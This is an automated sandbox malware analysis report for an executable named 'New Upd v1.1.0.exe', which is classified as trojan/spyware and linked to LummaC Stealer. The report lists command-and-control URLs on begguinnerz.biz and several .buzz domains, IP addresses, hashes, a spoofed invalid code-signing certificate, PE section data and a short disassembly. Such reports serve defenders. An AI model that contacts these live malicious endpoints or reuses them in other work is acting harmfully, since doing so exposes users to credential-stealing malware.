              https://begguinnerz.biz/Qm100%Avira URL Cloudmalware
              https://begguinnerz.biz/as100%Avira URL Cloudmalware
              https://begguinnerz.biz/apill100%Avira URL Cloudmalware
              https://begguinnerz.biz/api100%Avira URL Cloudmalware
              https://begguinnerz.biz/piYn100%Avira URL Cloudmalware
              https://begguinnerz.biz:443/api100%Avira URL Cloudmalware
              https://begguinnerz.biz:443/apiLQ100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalse
                high
                begguinnerz.biz
                104.21.92.91
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    high
                    hummskitnj.buzzfalse
                      high
                      rebuildeso.buzzfalse
                        high
                        appliacnesot.buzzfalse
                          high
                          screwamusresz.buzzfalse
                            high
                            begguinnerz.biztrue
                            • Avira URL Cloud: malware
                            unknown
                            cashfuzysao.buzzfalse
                              high
                              inherineau.buzzfalse
                                high
                                prisonyfork.buzzfalse
                                  high
                                  https://begguinnerz.biz/apitrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabNew Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://begguinnerz.biz/ymNew Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://crl.microsoftNew Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1957041720.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://begguinnerz.biz:443/apin.txtPKNew Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://begguinnerz.biz/New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17New Upd v1.1.0.exe, 00000000.00000003.1838952572.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838721426.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://begguinnerz.biz/apiamNew Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://x1.c.lencr.org/0New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.i.lencr.org/0New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://begguinnerz.biz/1nerNew Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallNew Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNew Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://begguinnerz.biz/piNew Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://begguinnerz.biz/UNew Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://begguinnerz.biz:443/apioQNew Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://support.mozilla.org/products/firefoxgro.allNew Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://begguinnerz.biz/AnNew Upd v1.1.0.exe, 00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888266882.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoNew Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://ocsp.rootca1.amazontrust.com0:New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016New Upd v1.1.0.exe, 00000000.00000003.1838952572.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838721426.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.ecosia.org/newtab/New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://begguinnerz.biz/api19New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brNew Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://begguinnerz.biz/apisNew Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://begguinnerz.biz/asNew Upd v1.1.0.exe, 00000000.00000003.1838881668.000000000399F000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1839511974.000000000399A000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838829498.000000000399C000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838777067.0000000003996000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1839281599.000000000399A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://begguinnerz.biz/pianNew Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://support.microsofNew Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://begguinnerz.biz/QmNew Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://begguinnerz.biz:443/apiLQNew Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://begguinnerz.biz/apillNew Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://begguinnerz.biz/piYnNew Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesNew Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://begguinnerz.biz:443/apiNew Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.21.92.91
                                                                              begguinnerz.bizUnited States
                                                                              13335CLOUDFLARENETUStrue
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1581509
                                                                              Start date and time:2024-12-27 23:20:09 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 4m 49s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:4
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:New Upd v1.1.0.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 75%
                                                                              • Number of executed functions: 4
                                                                              • Number of non-executed functions: 19
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Stop behavior analysis, all processes terminated
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 13.89.179.12, 52.149.20.212, 13.107.246.63
                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: New Upd v1.1.0.exe
                                                                              TimeTypeDescription
                                                                              17:21:12API Interceptor8x Sleep call for process: New Upd v1.1.0.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              104.21.92.91file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • suprafox.fun/api
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              begguinnerz.bizNewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                              • 172.67.190.223
                                                                              bg.microsoft.map.fastly.netJA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                              • 199.232.214.172
                                                                              wp.batGet hashmaliciousUnknownBrowse
                                                                              • 199.232.210.172
                                                                              final.exeGet hashmaliciousMeterpreterBrowse
                                                                              • 199.232.214.172
                                                                              n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                                                              • 199.232.214.172
                                                                              vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                              • 199.232.210.172
                                                                              54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                              • 199.232.214.172
                                                                              C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                              • 199.232.210.172
                                                                              P9UXlizXVS.exeGet hashmaliciousAsyncRATBrowse
                                                                              • 199.232.214.172
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSWonderHack.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.30.13
                                                                              Installer.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.66.86
                                                                              phish_alert_iocp_v1.4.48 - 2024-12-27T140703.193.emlGet hashmaliciousUnknownBrowse
                                                                              • 104.18.11.207
                                                                              SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.66.86
                                                                              SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                              • 104.21.73.97
                                                                              NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                              • 172.67.157.249
                                                                              ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.66.86
                                                                              iviewers.dllGet hashmaliciousLummaCBrowse
                                                                              • 104.21.60.24
                                                                              http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              launcher.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.58.80
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              a0e9f5d64349fb13191bc781f81f42e1WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.92.91
                                                                              Installer.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.92.91
                                                                              Installer.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.92.91
                                                                              SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.92.91
                                                                              NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.92.91
                                                                              ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.92.91
                                                                              iviewers.dllGet hashmaliciousLummaCBrowse
                                                                              • 104.21.92.91
                                                                              launcher.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.92.91
                                                                              Leside-.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.92.91
                                                                              search.htaGet hashmaliciousUnknownBrowse
                                                                              • 104.21.92.91
                                                                              No context
                                                                              No created / dropped files found
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.667131016451722
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:New Upd v1.1.0.exe
                                                                              File size:2'510'896 bytes
                                                                              MD5:3bdf3c4f1cfbb40a395ec5b10d97faf3
                                                                              SHA1:a8d14eccdc6693375a7e22d4cf8677c6a90f9ec4
                                                                              SHA256:a9748e3079e5e53cafe8a6251de92016f906d9e2c4e8d3835c641eb0de7c0edb
                                                                              SHA512:e8c636ec2b6dc9eb5aab1810ee48ced5cf0d977e64981108d02b3606b5b4d0c817e0d2b5f52789d7f804ca3c79b6465a06de696ad180926d1477ea3f5c21ad2c
                                                                              SSDEEP:49152:HI3ET1BPrOpCSIwGkVY6iLBGsKmluzhGTAxRu5:HT0HjigsKmIhGAx4
                                                                              TLSH:AFC5693CE1E1BC35E06610BF70B9E9190B5F1F911755A0CBE9C8F9A90EB2EC274A1D49
                                                                              File Content Preview:MZ......................@............................!..p...............!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..6...E%..r...Richs...........................PE..L.....^O..............SR.....P........@...<...C...@
                                                                              Icon Hash:35a6c55d754b0141
                                                                              Entrypoint:0x80ee8b
                                                                              Entrypoint Section:.text1
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x4F5EE4D0 [Tue Mar 13 06:10:24 2012 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:ba90881d3200a11da1ab805ba75978ee
                                                                              Signature Valid:false
                                                                              Signature Issuer:CN=DigiCert Global G3 Code Signing ECC SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                              Error Number:-2146869232
                                                                              Not Before, Not After
                                                                              • 28/01/2024 00:00:00 27/01/2027 23:59:59
                                                                              Subject Chain
                                                                              • CN="OBS Project, LLC", O="OBS Project, LLC", L=Sheridan, S=Wyoming, C=US, SERIALNUMBER=2023-001272252, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Wyoming, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                              Version:3
                                                                              Thumbprint MD5:5735EB42B275BF53C686D62E3D795F79
                                                                              Thumbprint SHA-1:EC0614E3D9455AA731992287C6F7E44A5288C232
                                                                              Thumbprint SHA-256:90C823C5701D7E1F9BE1DCDD3A2BC59ABE8DD93B734331AE8A3E68612A8CF3D1
                                                                              Serial:0D416A0683B8C191DEE8DEEEC54DAB37
                                                                              Instruction
                                                                              call 00007F0A1090F3BAh
                                                                              jmp 00007F0A1090718Bh
                                                                              push 0000000Ch
                                                                              push 00845EE0h
                                                                              call 00007F0A1090AAF8h
                                                                              and dword ptr [ebp-1Ch], 00000000h
                                                                              mov esi, dword ptr [ebp+08h]
                                                                              cmp esi, dword ptr [008497E8h]
                                                                              jnbe 00007F0A10907394h
                                                                              push 00000004h
                                                                              call 00007F0A1090AE8Ah
                                                                              pop ecx
                                                                              and dword ptr [ebp-04h], 00000000h
                                                                              push esi
                                                                              call 00007F0A1090D1EDh
                                                                              pop ecx
                                                                              mov dword ptr [ebp-1Ch], eax
                                                                              mov dword ptr [ebp-04h], FFFFFFFEh
                                                                              call 00007F0A1090737Eh
                                                                              mov eax, dword ptr [ebp-1Ch]
                                                                              call 00007F0A1090AB04h
                                                                              ret
                                                                              push 00000004h
                                                                              call 00007F0A1090AD87h
                                                                              pop ecx
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, dword ptr [esp+08h]
                                                                              cmp ebp, FFFFFFE0h
                                                                              ja 00007F0A10907415h
                                                                              push ebx
                                                                              mov ebx, dword ptr [008391E8h]
                                                                              push esi
                                                                              push edi
                                                                              xor esi, esi
                                                                              cmp dword ptr [008483F4h], esi
                                                                              mov edi, ebp
                                                                              jne 00007F0A1090738Ah
                                                                              call 00007F0A1090AC86h
                                                                              push 0000001Eh
                                                                              call 00007F0A1090AADFh
                                                                              push 000000FFh
                                                                              call 00007F0A10905B6Fh
                                                                              pop ecx
                                                                              pop ecx
                                                                              mov eax, dword ptr [008497F8h]
                                                                              cmp eax, 01h
                                                                              jne 00007F0A10907380h
                                                                              cmp ebp, esi
                                                                              je 00007F0A10907376h
                                                                              mov eax, ebp
                                                                              jmp 00007F0A10907375h
                                                                              xor eax, eax
                                                                              inc eax
                                                                              push eax
                                                                              jmp 00007F0A10907390h
                                                                              cmp eax, 03h
                                                                              jne 00007F0A1090737Dh
                                                                              push ebp
                                                                              call 00007F0A109072C8h
                                                                              cmp eax, esi
                                                                              pop ecx
                                                                              jne 00007F0A10907389h
                                                                              cmp ebp, esi
                                                                              jne 00007F0A10907375h
                                                                              xor edi, edi
                                                                              inc edi
                                                                              add edi, 0Fh
                                                                              and edi, 00000000h
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x4498200x50.data1
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5b90000xa7000.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x2630000x2030.text
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x4390000x2f4.data1
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x3b71140x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .data0x3b90000xf1740x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .text10x3c90000x600000x5b00005b936d6faccd76afeac8a45191260d5False0.3614864139766483data6.516961073142224IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .adata0x4290000x100000xd000938d6d97628275a512e07c66be5ccecfFalse0.0013897235576923077data0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .data10x4390000x300000x12000e1fafec24249c0e113957ac17997c421False0.3744439019097222data4.7613604097111795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .pdata0x4690000x1500000x1410005a01308111b52247d62a14416b33a673False1.0001650421047508data7.999596356493672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
